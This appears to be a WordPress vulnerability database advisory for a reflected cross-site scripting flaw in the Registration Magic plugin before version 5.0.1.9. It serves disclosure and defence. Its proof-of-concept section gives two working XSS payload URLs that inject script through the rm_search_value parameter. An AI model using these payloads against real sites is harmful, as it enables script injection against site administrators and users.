WordPress Plugin Vulnerabilities
Registration Magic < 5.0.1.9 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape the rm_search_value parameter before outputting back in an attribute, leading to a Reflected Cross-Site Scripting
Proof of Concept
v < 5.0.1.2 https://example.com/wp-admin/admin.php?page=rm_login_advanced&rm_search_value="><script>alert(/XSS/)</script> v < 5.0.1.9 https://example.com/wp-admin/admin.php?page=rm_login_advanced&rm_search_value="%20style=animation-name:rotation%20onanimationstart=alert(/XSS/)//
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
AyeCode Ltd
Submitter
Stiofan
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-12-28 (about 2 years ago)
Added
2021-12-28 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)